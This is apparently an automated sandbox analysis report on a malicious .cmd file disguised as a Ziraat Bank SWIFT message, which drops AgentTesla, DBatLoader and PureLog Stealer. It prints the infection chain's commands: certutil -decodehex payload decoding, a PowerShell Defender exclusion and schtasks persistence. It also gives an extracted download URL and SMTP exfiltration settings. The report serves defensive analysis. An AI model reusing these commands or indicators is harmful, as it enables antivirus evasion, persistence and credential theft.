Windows Analysis Report
Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd

Overview

General Information

Sample name: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd
Analysis ID: 1557469
MD5: 55275e90f2a4ca23422103276e8eae71
SHA1: 1799345fb5bf3cf04c44bfa5b59790c9e4e8a0af
SHA256: 0bd7bd207364b329f44fec39787189cc5755e9fc1a714cbf3b57be785e224596
Tags: cmduser-lowmal3

Detection

AgentTesla, DBatLoader, PureLog Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected DBatLoader
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains very large strings
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Creates files in the system32 config directory
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Drops executable to a common third party application directory
Drops large PE files
Drops or copies certutil.exe with a different name (likely to bypass HIPS)
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
Infects executable files (exe, dll, sys, html)
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Queries random domain names (often used to prevent blacklisting and sinkholes)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Registers a new ROOT certificate
Sample uses process hollowing technique
Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
Sigma detected: Execution from Suspicious Folder
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Parent in Public Folder Suspicious Process
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Program Location with Network Connections
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Connects to many different domains
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the user directory
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Executes massive DNS lookups (> 100)
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Installs a raw input device (often for capturing keystrokes)
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Spawns drivers
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • cmd.exe (PID: 7576 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • extrac32.exe (PID: 7820 cmdline: C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe" MD5: 41330D97BF17D07CD4308264F3032547)
    • alpha.exe (PID: 7864 cmdline: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • extrac32.exe (PID: 7880 cmdline: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe MD5: 41330D97BF17D07CD4308264F3032547)
    • alpha.exe (PID: 7916 cmdline: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd" "C:\\Users\\Public\\AnyDesk.jpeg" 9 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • kn.exe (PID: 7936 cmdline: C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd" "C:\\Users\\Public\\AnyDesk.jpeg" 9 MD5: F17616EC0522FC5633151F7CAA278CAA)
    • alpha.exe (PID: 8028 cmdline: C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 12 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • kn.exe (PID: 8044 cmdline: C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 12 MD5: F17616EC0522FC5633151F7CAA278CAA)
    • AnyDesk.PIF (PID: 8060 cmdline: C:\Users\Public\Libraries\AnyDesk.PIF MD5: E02910D2D83F40FAEF8719A99EE0EF5B)
      • cmd.exe (PID: 6368 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\aymtmquJ.cmd" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 2088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • esentutl.exe (PID: 5612 cmdline: C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o MD5: 5F5105050FBE68E930486635C5557F84)
        • esentutl.exe (PID: 6212 cmdline: C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o MD5: 5F5105050FBE68E930486635C5557F84)
      • esentutl.exe (PID: 6448 cmdline: C:\\Windows\\System32\\esentutl.exe /y C:\Users\Public\Libraries\AnyDesk.PIF /d C:\\Users\\Public\\Libraries\\Juqmtmya.PIF /o MD5: 5F5105050FBE68E930486635C5557F84)
        • conhost.exe (PID: 6472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • aymtmquJ.pif (PID: 6196 cmdline: C:\Users\Public\Libraries\aymtmquJ.pif MD5: C116D3604CEAFE7057D77FF27552C215)
        • Native_neworigin.exe (PID: 7256 cmdline: "C:\Users\user\AppData\Local\Temp\Native_neworigin.exe" MD5: 9ECE2AAE8E8FA77849268DDA20CAEC7B)
        • Trading_AIBot.exe (PID: 1240 cmdline: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" MD5: E91A1DB64F5262A633465A0AAFF7A0B0)
          • powershell.exe (PID: 2204 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • conhost.exe (PID: 8040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • WmiPrvSE.exe (PID: 1528 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
          • schtasks.exe (PID: 8056 cmdline: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 04:02 /du 23:59 /sc daily /ri 1 /f MD5: 48C2FE20575769DE916F48EF0676A965)
            • conhost.exe (PID: 8048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • alpha.exe (PID: 8072 cmdline: C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • alpha.exe (PID: 8092 cmdline: C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\AnyDesk.jpeg" / A / F / Q / S MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • alg.exe (PID: 7888 cmdline: C:\Windows\System32\alg.exe MD5: 1E467BDA5911F0899BC6AC04CDE8ACA5)
  • AppVStrm.sys (PID: 4 cmdline: MD5: BDA55F89B69757320BC125FF1CB53B26)
  • AppvVemgr.sys (PID: 4 cmdline: MD5: E70EE9B57F8D771E2F4D6E6B535F6757)
  • AppvVfs.sys (PID: 4 cmdline: MD5: 2CBABD729D5E746B6BD8DC1B4B4DB1E1)
  • AppVClient.exe (PID: 916 cmdline: C:\Windows\system32\AppVClient.exe MD5: 6341995A4613FCE6AD6219013E4B7646)
  • Juqmtmya.PIF (PID: 2180 cmdline: "C:\Users\Public\Libraries\Juqmtmya.PIF" MD5: E02910D2D83F40FAEF8719A99EE0EF5B)
    • aymtmquJ.pif (PID: 3508 cmdline: C:\Users\Public\Libraries\aymtmquJ.pif MD5: C116D3604CEAFE7057D77FF27552C215)
      • Native_neworigin.exe (PID: 3996 cmdline: "C:\Users\user\AppData\Local\Temp\Native_neworigin.exe" MD5: 9ECE2AAE8E8FA77849268DDA20CAEC7B)
      • Trading_AIBot.exe (PID: 5920 cmdline: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" MD5: E91A1DB64F5262A633465A0AAFF7A0B0)
  • Juqmtmya.PIF (PID: 2088 cmdline: "C:\Users\Public\Libraries\Juqmtmya.PIF" MD5: E02910D2D83F40FAEF8719A99EE0EF5B)
    • aymtmquJ.pif (PID: 6136 cmdline: C:\Users\Public\Libraries\aymtmquJ.pif MD5: C116D3604CEAFE7057D77FF27552C215)
  • cleanup
Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Name: DBatLoader
Description: This Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader
{"Download Url": ["https://gxe0.com/yak2/233_Juqmtmyadyy"]}
{"Exfil Mode": "SMTP", "Host": "info2@j-fores.com", "Username": "info@j-fores.com", "Password": "18 Nov 2024 04:29:17 -0500"}
Source | Rule | Description | Author
0000001B.00000002.1722177417.000000000305A000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security
0000002B.00000003.1635956799.0000000000705000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
0000002B.00000002.1772725476.0000000002A26000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
0000000F.00000003.1311463700.000000007FC50000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_DBatLoader | Yara detected DBatLoader | Joe Security
0000002B.00000002.1784000004.0000000002E20000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
Source | Rule | Description | Author
27.2.Native_neworigin.exe.52d0f08.5.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
43.2.Native_neworigin.exe.2a6711e.1.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
43.2.Native_neworigin.exe.5700000.8.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
27.2.Native_neworigin.exe.5360000.7.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security
27.2.Native_neworigin.exe.2fe0000.3.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security

                      System Summary

                      Source: File createdAuthor: frack113, Nasreddine Bencherchali: Data: EventID: 11, Image: C:\Users\Public\Libraries\AnyDesk.PIF, ProcessId: 8060, TargetFilename: C:\Windows \SysWOW64\NETUTILS.dll
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, CommandLine: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\alpha.exe, NewProcessName: C:\Users\Public\alpha.exe, OriginalFileName: C:\Users\Public\alpha.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7576, ParentProcessName: cmd.exe, ProcessCommandLine: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, ProcessId: 7864, ProcessName: alpha.exe
                      Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\Public\Juqmtmya.url, EventID: 13, EventType: SetValue, Image: C:\Users\Public\Libraries\AnyDesk.PIF, ProcessId: 8060, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Juqmtmya
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, CommandLine: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, CommandLine|base64offset|contains: {ki, Image: C:\Windows\System32\extrac32.exe, NewProcessName: C:\Windows\System32\extrac32.exe, OriginalFileName: C:\Windows\System32\extrac32.exe, ParentCommandLine: C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, ParentImage: C:\Users\Public\alpha.exe, ParentProcessId: 7864, ParentProcessName: alpha.exe, ProcessCommandLine: extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe, ProcessId: 7880, ProcessName: extrac32.exe
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, ParentProcessId: 1240, ParentProcessName: Trading_AIBot.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , ProcessId: 2204, ProcessName: powershell.exe
                      Source: Network ConnectionAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: DestinationIp: 198.252.105.91, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Users\Public\Libraries\AnyDesk.PIF, Initiated: true, ProcessId: 8060, Protocol: tcp, SourceIp: 192.168.2.10, SourceIsIpv6: false, SourcePort: 49730
                      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\Public\Juqmtmya.url, EventID: 13, EventType: SetValue, Image: C:\Users\Public\Libraries\AnyDesk.PIF, ProcessId: 8060, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Juqmtmya
                      Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\Public\Libraries\AnyDesk.PIF, CommandLine: C:\Users\Public\Libraries\AnyDesk.PIF, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\AnyDesk.PIF, NewProcessName: C:\Users\Public\Libraries\AnyDesk.PIF, OriginalFileName: C:\Users\Public\Libraries\AnyDesk.PIF, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7576, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Users\Public\Libraries\AnyDesk.PIF, ProcessId: 8060, ProcessName: AnyDesk.PIF
                      Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, ProcessId: 1240, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\apihost.exe.lnk
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 04:02 /du 23:59 /sc daily /ri 1 /f, CommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 04:02 /du 23:59 /sc daily /ri 1 /f, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, ParentProcessId: 1240, ParentProcessName: Trading_AIBot.exe, ProcessCommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 04:02 /du 23:59 /sc daily /ri 1 /f, ProcessId: 8056, ProcessName: schtasks.exe
                      Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 51.195.88.199, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe, Initiated: true, ProcessId: 7256, Protocol: tcp, SourceIp: 192.168.2.10, SourceIsIpv6: false, SourcePort: 49859
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, ParentProcessId: 1240, ParentProcessName: Trading_AIBot.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' , ProcessId: 2204, ProcessName: powershell.exe

                      AV Detection

                      Source: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeAvira: detection malicious, Label: W32/Infector.Gen
                      Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeAvira: detection malicious, Label: W32/Infector.Gen
                      Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeAvira: detection malicious, Label: W32/Infector.Gen
                      Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeAvira: detection malicious, Label: W32/Infector.Gen
                      Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeAvira: detection malicious, Label: W32/Infector.Gen
                      Source: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.149\117.0.5938.149_117.0.5938.132_chrome_updater.exeAvira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Au3Info.exe, Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe, Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe, Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe, Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe, Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe, Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe, Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe, Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe, Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe, Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe, Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Au3Check.exe, Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe, Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe, Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe, Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe, Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe, Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateuserer.exe, Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe, Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe, Avira: detection malicious, Label: W32/Infector.Gen
Source: WmiPrvSE.exe.1528.38.memstrmin, Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Host": "info2@j-fores.com", "Username": "info@j-fores.com", "Password": "18 Nov 2024 04:29:17 -0500"}
Source: AnyDesk.PIF.14.dr, Malware Configuration Extractor: DBatLoader {"Download Url": ["https://gxe0.com/yak2/233_Juqmtmyadyy"]}
Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd, ReversingLabs: Detection: 13%
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 99.9% probability
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe, Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe, Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe, Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe, Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe, Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.149\117.0.5938.149_117.0.5938.132_chrome_updater.exe, Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Au3Info.exe, Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe, Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe, Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe, Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe, Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe, Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe, Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe, Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe, Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe, Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe, Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Au3Check.exe, Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe, Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe, Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe, Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe, Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe, Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateuserer.exe, Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe, Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe, Joe Sandbox ML: detected
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B16D2C NCryptFreeBuffer,#360,12_2_00007FF627B16D2C
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AA2D18 #359,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,NCryptIsKeyHandle,#357,#357,NCryptIsKeyHandle,#357,#357,LocalFree,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,12_2_00007FF627AA2D18
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AE0D14 NCryptFinalizeKey,#205,#357,#357,12_2_00007FF627AE0D14
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627B16CE0 NCryptEnumStorageProviders,#360,12_2_00007FF627B16CE0
                      Source: C:\Users\Public\kn.exeCode function: 12_2_00007FF627AE2CFC CryptDestroyKey,#205,GetLastError,#357,SetLastError,12_2_00007FF627AE2CFC
